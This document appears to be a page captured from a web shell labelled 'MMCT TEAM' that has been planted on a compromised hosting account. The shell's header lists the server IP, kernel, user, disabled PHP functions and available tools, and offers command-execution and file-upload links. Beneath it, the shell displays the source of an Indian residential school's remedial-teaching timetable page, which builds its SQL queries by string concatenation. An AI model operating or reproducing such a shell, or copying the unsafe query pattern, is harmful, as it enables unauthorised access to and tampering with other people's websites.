MMCT TEAM
Server IP : 86.38.243.181  /  Your IP : 216.73.216.51
Web Server : LiteSpeed
System : Linux in-mum-web1336.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
User : u986601745 ( 986601745)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u986601745/domains/emrskalsi.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u986601745/domains/emrskalsi.com/public_html/remedial-teaching.php
<!DOCTYPE html>
<html lang="en" style="overflow-x: hidden;">
<head>
  <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Eklavya Model Residential School - Remedial Teaching</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
<?php include('include/header.php'); ?>

<div class="breadcrumbs">
    <div class="container">

    <!--    <h1 class="pull-left">
    Class Teacher</h1> -->

    <ul class="pull-left breadcrumb">
        <li><a href="javascript:void(0)">Academics</a></li>
        <li><a href="javascript:void(0)">Remedial Teaching</a></li>
    </ul>
    
</div>
</div>

</div>

<style>.menshow{display:block !important}
    .table > thead > tr > th, .table > tbody > tr > th, .table > tfoot > tr > th, .table > thead > tr > td, .table > tbody > tr > td, .table > tfoot > tr > td {
        vertical-align: middle!important;
    }
    tfoot {
    background: #ff0000;
    color: #fff;
}
thead th ,tfoot th{
    text-align: center;
}
</style>

</div></div><section class="cls_teachers" id="pr">
    <div class="container-fluid row"><div class="col-xs-12" ><div class="ap-section ">
      <div class="headline" id="headlines"><h2 >Eklavya Model Residential School , Kalsi Dehradun Remedial Time Table (<?php echo date('Y') ?>-<?php echo date('y')+1 ?>)</h2>
      </div>

      <div class="ap-plain" >  
      <p style="font-size:17px!important;">
          <strong>REMEDIAL TEACHING: - </strong> School offers compulsory extra coaching classes in the evening to students to better equip them with the learning process through coaching & self-study.
Specific efforts are given to low-performing students, which helps them to be on the same level as other students. The classroom study during School Hours is supplemented with evening Subject coaching.
Dedicated and Innovative teachers are personally responsible for students’ good results. The consistent good result of students proves our commitment.</p>

      </p>  
        <div >
            <table class="table table-bordered table-striped table-hover">
                <thead>
                    <tr>
                        <th>Day</th>
                        <th rowspan="2">Monday</th>
                        <th rowspan="2">Tuesday</th>
                        <th rowspan="2">Wednesday</th>
                        <th rowspan="2">Thursday</th>
                        <th rowspan="2">Friday</th>
                        </tr>
                        <tr>
                            <th>Class</th>
                        </tr>
                        </thead>
                        <?php
                        $q = "select * from remedial_class";
                        $query = mysqli_query($conn,$q);
                        while($res = mysqli_fetch_array($query)) {
                             $sql = "SELECT * FROM remedial WHERE class_id='".$res['id']."'";
                        $qry = mysqli_query($conn,$sql);
                        $row = mysqli_fetch_array($qry);
                            ?>
                            <tr class="text-center">

                                <th class="text-white text-center"><?php echo $res['class_name']; ?></th>
                                <td><?php echo $row['monday']; ?></td>
                                <td><?php echo $row['tuesday']; ?></td>
                                <td><?php echo $row['wednesday']; ?></td>
                                <td><?php echo $row['thursday']; ?></td>
                                <td><?php echo $row['friday']; ?></td>
                            </tr>
                        <?php } ?>
                    
                   
                </table>
                </div>
            </div>

        </div></div></div>
    </section>

    <?php include('include/footer.php'); ?>

MMCT - 2023